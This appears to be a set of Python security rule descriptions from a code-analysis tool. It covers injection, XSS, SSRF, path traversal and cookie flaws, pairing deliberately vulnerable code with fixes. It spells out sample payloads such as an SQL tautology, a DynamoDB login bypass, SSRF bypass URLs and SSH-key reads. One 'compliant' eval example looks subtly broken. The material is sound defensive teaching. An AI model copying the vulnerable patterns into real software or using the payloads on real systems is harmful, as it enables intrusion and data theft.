Allowing users to provide data for deserialization generally creates more problems than it solves.

Anything that can be done through deserialization can generally be done with more secure data structures.
Therefore, our first suggestion is to avoid deserialization in the first place.

However, if deserialization mechanisms are valid in your context, here are some security suggestions.

More secure serialization methods

Some more secure serialization methods reduce the risk of security breaches, although not definitively.

A complete object serializer is probably unnecessary if you only need to receive primitive data (for example integers, strings, bools, etc.).
In this case, formats such as JSON and XML protect the application from deserialization attacks by default.

For more complex objects, the next step is to control which class fields are exposed by creating class-specific serialization methods.
The most common method is to use Data Transfer Objects (DTO) patterns or Google Protocol Buffers (protobufs). After creating the Protobuf data structure, the Protobuf compiler creates class files that handle operations such as serializing and deserializing data.

Integrity check

Message authentication codes (MAC) can be used to prevent tampering with serialized data that is meant to be stored outside the application server:

  • On the server-side, when serializing an object, compute a MAC of the result and append it to the serialized object string.
  • When the serialized value is submitted back, verify the serialization string MAC on the server side before deserialization.

Depending on the situation, two MAC computation modes can be used.

If the same application will be responsible for the MAC computing and validation, a symmetric signature algorithm can be used. In that case, HMAC should be preferred, with a strong underlying hash algorithm such as SHA-256.

If multiple parties have to validate the serialized data, an asymetric signature algorithm should be used. This will reduce the chances for a signing secret to be leaked. In that case, the RSASSA-PSS algorithm can be used.

Note: Be sure to store the signing secret securely.

Resources

Standards

pythonsecurity:S5145

Why is this an issue?

Log injection occurs when an application fails to sanitize untrusted data used for logging.

An attacker can forge log content to prevent an organization from being able to trace back malicious activities.

What is the potential impact?

If an attacker can insert arbitrary data into a log file, the integrity of the chain of events being recorded can be compromised.
This frequently occurs because attackers can inject the log entry separator of the logger framework, commonly newlines, and thus insert artificial log entries.
Other attacks could also occur requiring only field pollution, such as cross-site scripting (XSS) or code injection (for example, Log4Shell) if the logged data is fed to other application components, which may interpret the injected data differently.

The focus of this rule is newline character replacement.

Log Forge

An attacker, able to create independent log entries by injecting log entry separators, inserts bogus data into a log file to conceal his malicious activities. This obscures the content for an incident response team to trace the origin of the breach as the indicators of compromise (IoCs) lead to fake application events.

How to fix it in Flask

Code examples

The following code is vulnerable to log injection as it constructs log entries using untrusted data. An attacker can leverage this to manipulate the chain of events being recorded.

Noncompliant code example

import logging

app = Flask(__name__)

@app.route('/example')
def log():
    data = request.args["data"]
    app.logger.critical("%s", data) # Noncompliant

Compliant solution

import logging
import base64

app = Flask(__name__)

@app.route('/example')
def log():
    data = request.args["data"]
    if data.isalnum():
        app.logger.critical("%s", data)
    else:
        app.logger.critical("Invalid Input: %s", base64.b64encode(data.encode('UTF-8')))

How does this work?

Data used for logging should be content-restricted and typed. This can be done by validating the data content or sanitizing it.
Validation and sanitization mainly revolve around preventing carriage return (CR) and line feed (LF) characters. However, further actions could be required based on the application context and the logged data usage.

Here, the example compliant code uses the isalnum function to ensure the untrusted data is safe. If not, it performs Base64 encoding to protect from log injection.

Resources

Standards

pythonsecurity:S5167

This rule is deprecated; use S5122, S5146, S6287 instead.

Why is this an issue?

User-provided data, such as URL parameters, POST data payloads, or cookies, should always be considered untrusted and tainted. Applications constructing HTTP response headers based on tainted data could allow attackers to change security sensitive headers like Cross-Origin Resource Sharing headers.

Web application frameworks and servers might also allow attackers to inject new line characters in headers to craft malformed HTTP response. In this case the application would be vulnerable to a larger range of attacks like HTTP Response Splitting/Smuggling. Most of the time this type of attack is mitigated by default modern web application frameworks but there might be rare cases where older versions are still vulnerable.

As a best practice, applications that use user-provided data to construct the response header should always validate the data first. Validation should be based on a whitelist.

Noncompliant code example

Flask

from flask import Response, request
from werkzeug.datastructures import Headers

@app.route('/route')
def route():
    content_type = request.args["Content-Type"]
    response = Response()
    headers = Headers()
    headers.add("Content-Type", content_type) # Noncompliant
    response.headers = headers
    return response

Django

import django.http

def route(request):
    content_type = request.GET.get("Content-Type")
    response = django.http.HttpResponse()
    response.__setitem__('Content-Type', content_type) # Noncompliant
    return response

Compliant solution

Flask

from flask import Response, request
from werkzeug.datastructures import Headers
import re

@app.route('/route')
def route():
    content_type = request.args["Content-Type"]
    allowed_content_types = r'application/(pdf|json|xml)'
    response = Response()
    headers = Headers()
    if re.match(allowed_content_types, content_type):
        headers.add("Content-Type", content_type)  # Compliant
    else:
        headers.add("Content-Type", "application/json")
    response.headers = headers
    return response

Django

import django.http
import re

def route(request):
    content_type = request.GET.get("Content-Type")
    allowed_content_types = r'application/(pdf|json|xml)'
    response = django.http.HttpResponse()
    if re.match(allowed_content_types, content_type):
        response.__setitem__('Content-Type', content_type) # Compliant
    else:
        response.__setitem__('Content-Type', "application/json")
    return response

Resources

pythonsecurity:S2076

Why is this an issue?

OS command injections occur when applications build command lines from untrusted data before executing them with a system shell.
In that case, an attacker can tamper with the command line construction and force the execution of unexpected commands. This can lead to the compromise of the underlying operating system.

What is the potential impact?

An attacker exploiting an OS command injection vulnerability will be able to execute arbitrary commands on the underlying operating system.

The impact depends on the access control measures taken on the target system OS. In the worst-case scenario, the process runs with root privileges, and therefore any OS commands or programs may be affected.

Below are some real-world scenarios that illustrate some impacts of an attacker exploiting the vulnerability.

Denial of service and data leaks

In this scenario, the attack aims to disrupt the organization’s activities and profit from data leaks.

An attacker could, for example:

  • download the internal server’s data, most likely to sell it
  • modify data, send malware
  • stop services or exhaust resources (with fork bombs for example)

This threat is particularly insidious if the attacked organization does not maintain a disaster recovery plan (DRP).

Root privilege escalation and pivot

In this scenario, the attacker can do everything described in the previous section. The difference is that the attacker also manages to elevate their privileges to an administrative level and attacks other servers.

Here, the impact depends on how much the target company focuses on its Defense In Depth. For example, the entire infrastructure can be compromised by a combination of OS injections and misconfiguration of:

  • Docker or Kubernetes clusters
  • cloud services
  • network firewalls and routing
  • OS access control

How to fix it in Python Standard Library

Code examples

The following code is vulnerable to command injections because it is using untrusted inputs to set up a new process. Therefore an attacker can execute an arbitrary program that is installed on the system.

Especially, in this example, if the host request parameter contains system shell control characters, the expected ping command behavior will be changed.

Noncompliant code example

def ping():
    cmd = "ping -c 1 %s" % request.args.get("host", "www.google.com")
    status = os.system(cmd) # Noncompliant
    return str(status == 0)

Compliant solution

def safe_ping():
    host = request.args.get("host", "www.google.com")
    status = subprocess.run(["ping", "-c", "1", "--", host]).returncode
    return str(status == 0)

How does this work?

Allowing users to execute operating system commands generally creates more problems than it solves.

Anything that can be done via operating system commands can usually be done via a language’s native SDK.
Therefore, our first suggestion is to avoid using OS commands in the first place.
However, if the application requires running OS commands with user-controlled data, here are some security suggestions.

Pre-Approved commands

If the application aims to execute only a small number of OS commands (for example, ls, pwd, and grep), the cleanest way to avoid this problem is to validate the input before using it in an OS command.

Create a list of authorized and secure commands that you want the application to be able to execute. Use absolute paths to avoid any ambiguity.
If a user input does not match an entry in this list, it should be rejected because it is considered unsafe.

Depending on the number of commands you want the application to support, the list can be either a regex string or any array type. If you use regexes, choose simple regexes to avoid ReDOS attacks. For example, you can accept only a specific set of executables, by using ^/bin/(ls|pwd|grep)$.

Important note: The application must do validation on the server side. Not on client-side front-ends.

Neutralize special characters

If the application is to execute complex commands that cannot be controlled thanks to pre-approved lists, the cleanest approach is to use special sanitization components, such as subprocess.

The library helps you to get rid of common dangerous characters, such as:

  • &
  • |
  • ;
  • $
  • >
  • <
  • \`
  • \\
  • !

If user input is to be included in the arguments of a command, the application must ensure that dangerous options or argument delimiters are neutralized.
Argument delimiters count ', - and spaces.

For example, the find command from UNIX supports the dangerous argument -exec.
In this case, option processing can be terminated with a string containing -- or with special options. For example, git supports --end-of-options since its version 2.24.

In the example compliant code, using the subprocess.run function helps to escape the passed arguments. It accepts a list of command arguments that will be properly escaped and concatenated to form the command line to execute.

Disable shell integration

In most cases, command execution libraries propose two ways to execute external program: with or without shell integration.

When shell integration is allowed, an attacker with control over the command arguments can simply execute additional external programs using system shell features. For example, on Unix, command pipelining (|) or string interpolation ($(), <(), etc.) can be used to break out of a command call.

Therefore, it is generally preferable to disable shell integration.

In the example compliant code, using the subprocess module’s functions is preferred over older alternative as the os or popen modules. Indeed, subprocess, while still a dangerous library, disables the system shell’s syntax interpretation by default.

Resources

Documentation

Standards

pythonsecurity:S5147

Why is this an issue?

NoSQL injections occur when an application retrieves untrusted data and inserts it into a database query without sanitizing it first.

What is the potential impact?

In the context of a web application that is vulnerable to NoSQL injection:
After discovering the injection point, attackers insert data into the vulnerable field to execute malicious commands in the affected databases.

Below are some real-world scenarios that illustrate some impacts of an attacker exploiting the vulnerability.

Identity spoofing and data leakage

In the context of simple query logic breakouts, a malicious database query enables privilege escalation or direct data leakage from one or more databases.
This threat is the most widespread impact.

Data deletion and denial of service

The malicious query makes it possible for the attacker to delete data in the affected databases.
This threat is particularly insidious if the attacked organization does not maintain a disaster recovery plan (DRP) as missing data can disrupt the regular operations of an organization.

Chaining NoSQL injections with other vulnerabilities

Attackers who exploit NoSQL injections rely on other vulnerabilities to maximize their profits.
Most of the time, organizations overlook some defense in depth measures because they assume attackers cannot reach certain points in the infrastructure. This misbehavior can lead to multiple attacks with great impact:

  • When secrets are stored unencrypted in databases: Secrets can be exfiltrated and lead to compromise of other components.
  • If server-side OS and/or database permissions are misconfigured, injection can lead to remote code execution (RCE).

How to fix it in Amazon DynamoDB

Code examples

The following code is vulnerable to NoSQL injection because untrusted data is concatenated to the FilterExpression value. This expression determines which items within the results should be returned.

A malicious HTTP request containing the following query parameter values username=admin&password=size(password) or size(password)=size(password) would allow an attacker to manipulate the returned data and bypass authentication.

Noncompliant code example

@app.route('/login')
def login():
    dynamodb = AWS_SESSION.client('dynamodb')

    username = request.args["username"]
    password = request.args["password"]

    dynamodb.scan(
        FilterExpression= "username = " + username + " and password = " + password, # Noncompliant
        TableName="users",
        ProjectionExpression="username"
    )

Compliant solution

@app.route('/login')
def login():
    dynamodb = AWS_SESSION.client('dynamodb')

    username = request.args["username"]
    password = request.args["password"]

    dynamodb.query(
        KeyConditionExpression= "username = :u",
        FilterExpression= "password = :p",
        ExpressionAttributeValues={
            ":u": { 'S': username },
            ":p": { 'S': password }
        },
        TableName="users",
        ProjectionExpression="username"
    )

How does this work?

As a rule of thumb, the approach to protect against injection vulnerabilities is to ensure that untrusted data cannot break out of the initially intended logic.

When using DynamoDB with Boto3, the best way to do so is by using expression attributes as placeholders (:placeholder). It will end up replacing the attribute with the value defined in ExpressionAttributeValues and prevent any alteration of the original query logic. The compliant code example uses such an approach.

When possible, use the method query over scan as it disallows the OR operator on the KeyConditionExpression attribute and therefore reduces the attack surface. It also optimizes speed and costs.

This logic applies both when using the DynamoDB.Client and the DynamoDB.Table class, though the syntax differs for the latter, and the ExpressionAttributeValues would look like the following:

ExpressionAttributeValues={
    ":u": username,
    ":p": password
}

Although injection can occur on all the query or scan Expression attributes, its most severe impact occurs in the FilterExpression.

Resources

Articles & blog posts

Standards

pythonsecurity:S5334

Why is this an issue?

Code injections occur when applications allow the dynamic execution of code instructions from untrusted data.
An attacker can influence the behavior of the targeted application and modify it to get access to sensitive data.

What is the potential impact?

An attacker exploiting a dynamic code injection vulnerability will be able to execute arbitrary code in the context of the vulnerable application.

The impact depends on the access control measures taken on the target system OS. In the worst-case scenario, the process that executes the code runs with root privileges, and therefore any OS commands or programs may be affected.

Below are some real-world scenarios that illustrate some impacts of an attacker exploiting the vulnerability.

Denial of service and data leaks

In this scenario, the attack aims to disrupt the organization’s activities and profit from data leaks.

An attacker could, for example:

  • download the internal server’s data, most likely to sell it
  • modify data, send malware
  • stop services or exhaust resources (with fork bombs for example)

This threat is particularly insidious if the attacked organization does not maintain a disaster recovery plan (DRP).

Root privilege escalation and pivot

In this scenario, the attacker can do everything described in the previous section. The difference is that the attacker also manages to elevate their privileges to an administrative level and attacks other servers.

Here, the impact depends on how much the target company focuses on its Defense In Depth. For example, the entire infrastructure can be compromised by a combination of code injections and misconfiguration of:

  • Docker or Kubernetes clusters
  • cloud services
  • network firewalls and routing
  • OS access control

How to fix it in Python Standard Library

Code examples

The following code is vulnerable to arbitrary code execution because it runs dynamic Python code based on untrusted data.

Noncompliant code example

from flask import request

@app.route("/")
def example():
    operation = request.args.get("operation")
    eval(f"product_{operation}()") # Noncompliant
    return "OK"

Compliant solution

from flask import request

@app.route("/")
def example():
    allowed = ["add", "remove", "update"]
    operation = allowed[request.args.get("operationId")]
    eval(f"product_{operation}()")

    return "OK"

How does this work?

Allowing users to execute code dynamically generally creates more problems than it solves.

Anything that can be done via dynamic code execution can usually be done via a language’s native SDK and static code.
Therefore, our suggestion is to avoid executing code dynamically.
If the application requires the execution of dynamic code, additional security measures must be taken.

Dynamic parameters

When the untrusted values are only expected to be values used in standard processing, it is generally possible to provide them as parameters of the dynamic code. In that case, care should be taken to ensure that only the name of the untrusted parameter is passed to the dynamic code and not that its value is expanded into it. After that, the dynamic code will be able to safely access the untrusted parameter content and perform the processing.

Allow list

When the untrusted parameters are expected to contain operators, function names or other reflection-related values, best practices would encourage using an allow list. This one would contain a list of accepted safe values that can be used as part of the dynamic code.

When receiving an untrusted parameter, the application would verify its value is contained in the configured allow list. If it is present, the parameter is accepted. Otherwise, it is rejected and an error is raised.

Another similar approach is using a binding between identifiers and accepted values. That way, users are only allowed to provide identifiers, where only valid ones can be converted to a safe value.

The example compliant code uses such a binding approach.

Resources

Articles & blog posts

Standards

pythonsecurity:S3649

Why is this an issue?

Database injections (such as SQL injections) occur in an application when the application retrieves data from a user or a third-party service and inserts it into a database query without sanitizing it first.

If an application contains a database query that is vulnerable to injections, it is exposed to attacks that target any database where that query is used.

A user with malicious intent carefully performs actions whose goal is to modify the existing query to change its logic to a malicious one.

After creating the malicious request, the attacker can attack the databases affected by this vulnerability without relying on any pre-requisites.

What is the potential impact?

In the context of a web application that is vulnerable to SQL injection:
After discovering the injection, attackers inject data into the vulnerable field to execute malicious commands in the affected databases.

Below are some real-world scenarios that illustrate some impacts of an attacker exploiting the vulnerability.

Identity spoofing and data manipulation

A malicious database query enables privilege escalation or direct data leakage from one or more databases. This threat is the most widespread impact.

Data deletion and denial of service

The malicious query makes it possible for the attacker to delete data in the affected databases.
This threat is particularly insidious if the attacked organization does not maintain a disaster recovery plan (DRP).

Chaining DB injections with other vulnerabilities

Attackers who exploit SQL injections rely on other vulnerabilities to maximize their profits.
Most of the time, organizations overlook some defense in depth measures because they assume attackers cannot reach certain points in the infrastructure. This misbehavior can lead to multiple attacks with great impact:

  • When secrets are stored unencrypted in databases: Secrets can be exfiltrated and lead to compromise of other components.
  • If server-side OS and/or database permissions are misconfigured, injection can lead to remote code execution (RCE).

How to fix it in SQLAlchemy

Code examples

The following code is an example of an overly simple data retrieval function. It is vulnerable to SQL injection because user-controlled data is inserted directly into a query string: The application assumes that incoming data always has a specific range of characters and ignores that some characters may change the query logic to a malicious one.

In this particular case, the query can be exploited with the following string:

' OR '1'='1

Using the UNION clause, an attacker would also be able to perform queries against other tables and combine the returned data within the same query result.

Noncompliant code example

from flask import request
import sqlalchemy

@app.route('/example')
def get_users():
    user = request.args["user"]
    conn = sqlalchemy.create_engine(connection_string)
    conn = engine.connect()

    conn.execute("SELECT user FROM users WHERE user = '" + user + "'") # Noncompliant

Compliant solution

from flask import request
import sqlalchemy

@app.route('/example')
def get_users():
    user = request.args["user"]
    conn = sqlalchemy.create_engine(connection_string)
    metadata = sqlalchemy.MetaData(bind=conn, reflect=True)
    users = metadata.tables['users']
    conn = engine.connect()

    sql = users.select().where(users.c.user == user)
    conn.execute(sql)

How does this work?

Use secure APIs

Some frameworks provide a database abstraction layer that frees the developers from sanitizing or writing prepared statements.

These provided APIs can be described as "secure by design".
By providing a builder pattern with parameter binding behind the scenes, SQLAlchemy can be called "secure by design" as it adds multiple layers of security to the code while keeping the codebase shorter.

Note: These types of APIs can also provide "raw" functions or equivalents. These functions allow developers to create complex queries using the user-friendly builder pattern.
These methods should be considered unsafe and should not be used with untrusted data. For example, SQLAlchemy exposes sqlalchemy.text() that is prone to injections.

Resources

Articles & blog posts

Standards

pythonsecurity:S5131

This vulnerability makes it possible to temporarily execute JavaScript code in the context of the application, granting access to the session of the victim. This is possible because user-provided data, such as URL parameters, are copied into the HTML body of the HTTP response that is sent back to the user.

Why is this an issue?

Reflected cross-site scripting (XSS) occurs in a web application when the application retrieves data like parameters or headers from an incoming HTTP request and inserts it into its HTTP response without first sanitizing it. The most common cause is the insertion of GET parameters.

When well-intentioned users open a link to a page that is vulnerable to reflected XSS, they are exposed to attacks that target their own browser.

A user with malicious intent carefully crafts the link beforehand.

After creating this link, the attacker must use phishing techniques to ensure that his target users click on the link.

What is the potential impact?

A well-intentioned user opens a malicious link that injects data into the web application. This data can be text, but it can also be arbitrary code that can be interpreted by the target user’s browser, such as HTML, CSS, or JavaScript.

Below are some real-world scenarios that illustrate some impacts of an attacker exploiting the vulnerability.

Vandalism on the front-end website

The malicious link defaces the target web application from the perspective of the user who is the victim. This may result in loss of integrity and theft of the benevolent user’s data.

Identity spoofing

The forged link injects malicious code into the web application. The code enables identity spoofing thanks to cookie theft.

Record user activity

The forged link injects malicious code into the web application. To leak confidential information, attackers can inject code that records keyboard activity (keylogger) and even requests access to other devices, such as the camera or microphone.

Chaining XSS with other vulnerabilities

In many cases, bug hunters and attackers chain cross-site scripting vulnerabilities with other vulnerabilities to maximize their impact.
For example, an XSS can be used as the first step to exploit more dangerous vulnerabilities or features that require higher privileges, such as a code injection vulnerability in the admin control panel of a web application.

How to fix it in Django

Code examples

The following code is vulnerable to cross-site scripting because it returns an HTML response that contains user input.

If you do not intend to send HTML code to clients, the vulnerability can be fixed by specifying the type of data returned in the response. For example, you can use the JsonResponse class to return JSON messages securely.

Noncompliant code example

from django.http import HttpResponse
import json

def index(request):
    json = json.dumps({ "data": request.GET.get("input") })
    return HttpResponse(json)

Compliant solution

from django.http import JsonResponse

def index(request):
    json = { "data": request.GET.get("input") }
    return JsonResponse(json)

It is also possible to set the content-type manually with the content_type parameter when creating an HttpResponse object.

Noncompliant code example

from django.http import HttpResponse

def index(request):
    return HttpResponse(request.GET.get("input"))

Compliant solution

from django.http import HttpResponse

def index(request):
    return HttpResponse(request.GET.get("input"), content_type="text/plain")

How does this work?

If the HTTP response consists of HTML code, it is highly recommended to use a template engine like Django’s template system to generate it. The Django template engine separates the view from the business logic and automatically encodes the output of variables, drastically reducing the risk of cross-site scripting vulnerabilities.

If you do not intend to send HTML code to clients, the vulnerability can be fixed by telling them what data they are receiving with the content-type HTTP header. This header tells the browser that the response does not contain HTML code and should not be parsed and interpreted as HTML. Thus, the response is not vulnerable to reflected cross-site scripting.

For example, setting the Content-Type HTTP header to text/plain allows to safely reflect user input, because browsers will not try to parse and execute the response.

Pitfalls

Content-types

Be aware that there are more content-types than text/html that allow to execute JavaScript code in a browser and thus are prone to cross-site scripting vulnerabilities.
The following content-types are known to be affected:

  • application/mathml+xml
  • application/rdf+xml
  • application/vnd.wap.xhtml+xml
  • application/xhtml+xml
  • application/xml
  • image/svg+xml
  • multipart/x-mixed-replace
  • text/html
  • text/rdf
  • text/xml
  • text/xsl

The limits of validation

Validation of user inputs is a good practice to protect against various injection attacks. But for XSS, validation on its own is not the recommended approach.

As an example, filtering out user inputs based on a deny-list will never fully prevent XSS vulnerability from being exploited. This practice is sometimes used by web application firewalls. It is only a matter of time for malicious users to find the exploitation payload that will defeat the filters.

Another example is applications that allow users or third-party services to send HTML content to be used by the application. A common approach is trying to parse HTML and strip sensitive HTML tags. Again, this deny-list approach is vulnerable by design: maintaining a list of sensitive HTML tags, in the long run, is very difficult.

A preferred option is to use Markdown in conjunction with a parser that removes embedded HTML and restricts the use of "javascript:" URI.

Going the extra mile

Content Security Policy (CSP) Header

With a defense-in-depth security approach, the CSP response header can be added to instruct client browsers to block loading data that does not meet the application’s security requirements. If configured correctly, this can prevent any attempt to exploit XSS in the application.
Learn more here.

Resources

Documentation

Articles & blog posts

Conference presentations

Standards

pythonsecurity:S5496

Why is this an issue?

Server-side template injections occur in an application when the application retrieves data from a user or a third-party service and inserts it into a template, without sanitizing it first.

If an application contains a template that is vulnerable to injections, it is exposed to attacks that target the underlying rendering server.

A user with malicious intent can create requests that will cause the template to change its logic into unwanted behavior.

After creating the malicious request, the attacker can attack the servers affected by this vulnerability without relying on any prerequisites.

What is the potential impact?

An attacker exploiting a server-side template injection vulnerability will be able to execute arbitrary commands on the underlying operating system.

The impact depends on the access control measures taken on the target system OS. In the worst-case scenario, the process runs with root privileges, and therefore any OS commands or programs may be affected.

Below are some real-world scenarios that illustrate some impacts of an attacker exploiting the vulnerability.

Denial of service and data leaks

In this scenario, the attack aims to disrupt the organization’s activities and profit from data leaks.

An attacker could, for example:

  • download the internal server’s data, most likely to sell it
  • modify data, send malware
  • stop services or exhaust resources (with fork bombs for example)

This threat is particularly insidious if the attacked organization does not maintain a disaster recovery plan (DRP).

Root privilege escalation and pivot

In this scenario, the attacker can do everything described in the previous section. The difference is that the attacker also manages to elevate their privileges to an administrative level and attacks other servers.

Here, the impact depends on how much the target company focuses on its Defense In Depth. For example, the entire infrastructure can be compromised by a combination of OS injections and misconfiguration of:

  • Docker or Kubernetes clusters
  • cloud services
  • network firewalls and routing
  • OS access control

How to fix it

Code examples

Noncompliant code example

The following code is vulnerable to server-side template injection because it is inserting untrusted inputs into a string that is then processed for rendering.
This vulnerability arises because the rendering function does not validate the input, allowing attackers to potentially inject malicious Python code for execution.

from flask import request, render_template_string

@app.route('/example')
def example():
    username = request.args.get('username')
    template = f"<p>Hello {username}</p>"
    return render_template_string(template) # Noncompliant

Compliant solution

from flask import request, render_template_string

@app.route('/example')
def example():
    username = request.args.get('username')
    template = "<p>Hello {{ username }}</p>"
    return render_template_string(template, username=username)

How does this work?

Use template variables

The universal method to prevent path injection is to sanitize untrusted data. Manual sanitization is error-prone, so it is best to automate the process.

Here, render_template_string automatically sanitizes template variables by escaping them. This means that any untrusted data will not be able to break out of the initially intended template logic.

Resources

Articles & blog posts

Standards

pythonsecurity:S5144

Why is this an issue?

Server-Side Request Forgery (SSRF) occurs when attackers can coerce a server to perform arbitrary requests on their behalf.

An SSRF vulnerability can either be basic or blind, depending on whether the server’s fetched data is directly returned in the web application’s response.
The absence of the corresponding response for the coerced request on the application is not a barrier to exploitation and thus must be treated in the same way as basic SSRF.

What is the potential impact?

SSRF usually results in unauthorized actions or data disclosure in the vulnerable application or on a different system it can reach. Conditional to what is reachable, remote command execution can be achieved, although it often requires chaining with further exploitations.

Information disclosure is SSRF’s core outcome. Depending on the extracted data, an attacker can perform a variety of different actions that can range from low to critical severity.

Below are some real-world scenarios that illustrate some impacts of an attacker exploiting the vulnerability.

Local file read to host takeover

An attacker manipulates an application into performing a local request for a sensitive file, such as ~/.ssh/id_rsa, by using the File URI scheme file://.
Once in possession of the SSH keys, the attacker establishes a remote connection to the system hosting the web application.

Internal Network Reconnaissance

An attacker enumerates internal accessible ports from the affected server or others to which the server can communicate by iterating over the port field in the URL http://127.0.0.1:{port}.
Taking advantage of other supported URL schemas (dependent on the affected system), for example, gopher://127.0.0.1:3306, an attacker would be able to connect to a database service and perform queries on it.

How to fix it in Python Standard Library

Code examples

The following code is vulnerable to SSRF as it opens a URL defined by untrusted data.

Noncompliant code example

from flask import request
from urllib.request import urlopen

@app.route('/example')
def example():
    url = request.args["url"]
    urlopen(url).read() # Noncompliant

Compliant solution

from flask import request
from urllib.parse import urlparse
from urllib.request import urlopen

SCHEMES_ALLOWLIST = ['https']
DOMAINS_ALLOWLIST = ['trusted1.example.com', 'trusted2.example.com']

@app.route('/example')
def example():
    url = request.args["url"]
    if urlparse(url).hostname in DOMAINS_ALLOWLIST and urlparse(url).scheme in SCHEMES_ALLOWLIST:
        urlopen(url).read()

How does this work?

The application should avoid opening URLs that are constructed with untrusted data.

When such a feature is strictly necessary, SSRF can be mitigated by applying an allow-list of trustable schemes and domains.

The compliant code example uses such an approach.

Pitfalls

The trap of 'StartsWith' and equivalents

When validating untrusted URLs by checking if they start with a trusted scheme and authority pair scheme://authority, ensure that the validation string contains a path separator / as the last character.

If the validation string does not contain a terminating path separator, the SSRF vulnerability remains; only the exploitation technique changes.

Thus, a validation like startsWith("https://example.com") or an equivalent with the regex ^https://example\.com.* can be exploited with the following URL https://example.commit.malicious.io.

Resources

Standards

pythonsecurity:S2083

Why is this an issue?

Path injections occur when an application uses untrusted data to construct a file path and access this file without validating its path first.

A user with malicious intent would inject specially crafted values, such as ../, to change the initial intended path. The resulting path would resolve somewhere in the filesystem where the user should not normally have access to.

What is the potential impact?

A web application is vulnerable to path injection and an attacker is able to exploit it.

The files that can be affected are limited by the permission of the process that runs the application. Worst case scenario: the process runs with root privileges on Linux, and therefore any file can be affected.

Below are some real-world scenarios that illustrate some impacts of an attacker exploiting the vulnerability.

Override or delete arbitrary files

The injected path component tampers with the location of a file the application is supposed to delete or write into. The vulnerability is exploited to remove or corrupt files that are critical for the application or for the system to work properly.

It could result in data being lost or the application being unavailable.

Read arbitrary files

The injected path component tampers with the location of a file the application is supposed to read and output. The vulnerability is exploited to leak the content of arbitrary files from the file system, including sensitive files like SSH private keys.

How to fix it in Flask

Code examples

The following code is vulnerable to path injection as it creates a path using untrusted data without validation.

An attacker can exploit the vulnerability in this code to read arbitrary files.

Noncompliant code example

from flask import Flask, request, send_from_directory

app = Flask('example')

@app.route('/example')
def example():
    my_file = request.args['my_file']
    return send_file("static/%s" % my_file, as_attachment=True) # Noncompliant

Compliant solution

from flask import Flask, request, send_from_directory

app = Flask('example')

@app.route('/example')
def example():
    my_file = request.args['my_file']
    return send_from_directory('static', my_file)

How does this work?

The universal method to prevent path injection is to validate paths created from untrusted data. This can be done either manually or automatically, depending on whether the library includes a data sanitization feature and the required function.

Here, send_from_directory can be considered a secure-by-design API.

Use secure-by-design APIs

Some libraries contain APIs with these three capabilities:

  • File retrieval in a file system.
  • Restriction of the file retrieval to a specific folder (thus sanitizing and validating untrusted data).
  • A feature, such as a file download or file deletion.

They can be referred to as "secure-by-design" APIs. Using this type of API, such as 'send_from_directory', brings multiple layers of security to the code while keeping the code base shorter.

Behind the scenes, this function protects against both regular and partial path injection.

Pitfalls

Do not use os.path.join as a validator

The official documentation states that if any argument other than the first is an absolute path, any previous argument is discarded.

This means that including untrusted data in any of the parameters and using the resulting string for file operations may lead to a path traversal vulnerability.

If you want to learn more about this pitfall, read our blog post about it.

Resources

Standards

pythonsecurity:S6287

Why is this an issue?

Session Cookie Injection occurs when a web application assigns session cookies to users using untrusted data.

Session cookies are used by web applications to identify users. Thus, controlling these enable control over the identity of the users within the application.

The injection might occur via a GET parameter, and the payload, for example, https://example.com?cookie=injectedcookie, delivered using phishing techniques.

What is the potential impact?

A well-intentioned user opens a malicious link that injects a session cookie in their web browser. This forces the user into unknowingly browsing a session that isn’t theirs.

Below are some real-world scenarios that illustrate some impacts of an attacker exploiting the vulnerability.

Sensitive data disclosure

A victim introduces sensitive data within the attacker’s application session that can later be retrieved by them. This can lead to a variety of implications depending on what type of data is disclosed. Strictly confidential user data or organizational data leakage have different impacts.

Vulnerability chaining

An attacker not only manipulates a user into browsing an application using a session cookie of their control but also successfully detects and exploits a self-XSS on the target application.
The victim browses the vulnerable page using the attacker’s session and is affected by the XSS, which can then be used for a wide range of attacks including credential stealing using mirrored login pages.

How to fix it in Django

Code examples

The following code is vulnerable to Session Cookie Injection as it assigns a session cookie using untrusted data.

Noncompliant code example

from django.shortcuts import render

def check_cookie(request):
    response = render(request, "welcome.html")

    if not "sessionid" in request.COOKIE:
        cookie = request.GET.get("cookie")
        response.set_cookie("sessionid", cookie)  # Noncompliant

    return response

Compliant solution

from django.http import HttpResponseRedirect
from django.shortcuts import render

def check_cookie(request):
    response = render(request, "welcome.html")

    if not "sessionid" in request.COOKIE:
        return HttpResponseRedirect("/getcookie")

    return response

How does this work?

Untrusted data, such as GET or POST request content, should always be considered tainted. Therefore, an application should not blindly assign the value of a session cookie to untrusted data.

Session cookies should be generated using the built-in APIs of secure libraries that include session management instead of developing homemade tools.
Often, these existing solutions benefit from quality maintenance in terms of features, security, or hardening, and it is usually better to use these solutions than to develop your own.

Resources

Standards

pythonsecurity:S6350

Constructing arguments of system commands from user input is security-sensitive. It has led in the past to the following vulnerabilities:

Arguments of system commands are processed by the executed program. The arguments are usually used to configure and influence the behavior of the programs. Control over a single argument might be enough for an attacker to trigger dangerous features like executing arbitrary commands or writing files into specific directories.

Ask Yourself Whether

  • Malicious arguments can result in undesired behavior in the executed command.
  • Passing user input to a system command is not necessary.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

  • Avoid constructing system commands from user input when possible.
  • Ensure that no risky arguments can be injected for the given program, e.g., type-cast the argument to an integer.
  • Use a more secure interface to communicate with other programs, e.g., the standard input stream (stdin).

Sensitive Code Example

Arguments like -delete or -exec for the find command can alter the expected behavior and result in vulnerabilities:

import subprocess
input = request.get('input')
subprocess.run(["/usr/bin/find", input]) # Sensitive

Compliant Solution

Use an allow-list to restrict the arguments to trusted values:

import subprocess
input = request.get('input')
if input in allowed:
    subprocess.run(["/usr/bin/find", input])

See

pythonsecurity:S2091

Why is this an issue?

XPath injections occur in an application when the application retrieves untrusted data and inserts it into an XML Path (XPath) query without sanitizing it first.

What is the potential impact?

In the context of a web application vulnerable to XPath injection:
After discovering the injection point, attackers insert data into the vulnerable field to execute malicious commands in the affected XML documents.

The impact of this vulnerability depends on the importance of XML structures in the enterprise.
In cases where organizations rely on XML structures for business-critical operations or where XML is used only for innocuous data transport, the severity of an attack ranges from critical to harmless.

Below are some real-world scenarios that illustrate some impacts of an attacker exploiting the vulnerability.

Data Leaks

A malicious XPath query allows direct data leakage from one or more databases. Although XML is not as widely used as it once was, this possibility still exists with configuration files, for example.

Data deletion and denial of service

The malicious query allows the attacker to delete data in the affected XML documents.
